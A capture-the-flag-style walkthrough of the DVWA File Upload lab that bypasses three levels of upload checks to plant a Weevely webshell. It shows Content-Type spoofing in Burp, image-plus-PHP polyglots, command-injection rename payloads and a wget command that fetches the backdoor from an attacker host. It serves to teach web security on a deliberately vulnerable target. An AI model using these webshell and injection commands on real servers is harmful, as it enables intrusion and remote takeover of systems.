
DVWA File Upload Lab
Intended function
Upload an image (or any other attachment) to the server.
Low difficulty
Code analysis
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    // (no check on name, extension, MIME type, size or content)
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        $html .= '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
The server applies no restriction at all to the uploaded file (only basename() is applied to the name, and nothing looks at the extension or content), so a webshell can be uploaded directly.
Generating a webshell with Weevely
Besides a simple one-line PHP webshell, Weevely can generate a full backdoor agent. The first argument is the connection password, the second the output file:
weevely generate FancyPig file_inclusion.php

Upload that file through the form.


Connecting to the server with Weevely
Connect with weevely, passing the URL of the uploaded agent and the password chosen above:
weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig
We are now connected to the server as the web server's www user and can run shell commands.

Medium difficulty
Code analysis
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];   // client-supplied Content-Type of the part
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
This version restricts the type and size of the upload: the MIME type must be image/jpeg or image/png and the size must be below 100000 bytes. The catch is that $_FILES['uploaded']['type'] is simply the Content-Type header the client sent for the multipart part; the server never inspects the file's bytes, so the check is fully under the attacker's control.
Changing the file type
Rename the file generated by Weevely so that it has a .png extension. The browser chooses the part's Content-Type from the extension, so it will now send image/png.

Intercept the upload request in Burp; the Content-Type of the file part is now image/png.
Change the .png in the filename field back to .php, leave the Content-Type as it is, and forward the request.
The server reports that the upload succeeded.

Connecting to the server
Connect with weevely as before:
weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig
We are again connected to the server as the web server's www user and can run shell commands.

High difficulty
Code analysis
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);   // text after the last dot
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {   // only the image header is parsed

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
The Medium code was bypassable because it relied on the client-supplied Content-Type. The High code instead checks the file extension (lower-cased, must be jpg, jpeg or png), the size, and getimagesize(), which requires the file to start with a valid image header. Editing the request in Burp is therefore no longer enough to get a .php file onto the server.
Two properties of the check still leave room: the extension test only looks at what follows the last dot, and getimagesize() only reads the image header and ignores whatever follows it. A file that is a real image with PHP code appended passes all three tests as long as it is named .png or .jpg. Once it is on disk we need another DVWA vulnerability, for example Command Injection, to rename it so that its suffix becomes .php and the web server executes it.
Approach 1: crop a tiny image, merge it with the shell, then connect with Cknife
Create and merge the image
Crop a very small image (about the size of a single pixel) so that the combined file stays well under the 100000-byte limit.

Then merge the image and the shell into one file, image first.

Upload it.

Use Command Injection to rename the file (the exec page runs from vulnerabilities/exec/, hence the relative path):
ping 127.0.0.1 |mv ../../hackable/uploads/test.png ../../hackable/uploads/test.php

Then connect with Cknife; the connection succeeds.

Approach 2: crop a tiny image, merge it with the shell, then connect with Weevely
Create and merge the image (the image must come first so that its header is what getimagesize() sees; >> appends, so make sure test2.png does not already exist):
weevely generate FancyPig test.php
cat screenshot.png test.php >> test2.png

The upload succeeds.

Use Command Injection to rename the file:
ping 127.0.0.1 |mv ../../hackable/uploads/test2.png ../../hackable/uploads/test2.php

Connect with Weevely:
weevely http://192.168.47.129/dvwa/hackable/uploads/test2.php FancyPig

Approach 3: upload the backdoor through Command Injection instead of the upload form

Download test.txt (the Weevely agent served from the attacker's host) with wget. The command runs in the working directory of the exec page, so the file lands in vulnerabilities/exec/; this only works if the web server's user can write there:
ping 127.0.0.1 |wget http://192.168.47.128/test/test.txt

Verify (for example with ls) that the file has been fetched.

Rename test.txt to test.php:
ping 127.0.0.1 |mv test.txt test.php

Verify that the rename succeeded.

Connect with Weevely, this time at the exec page's directory:
weevely http://192.168.47.129/dvwa/vulnerabilities/exec/test.php FancyPig
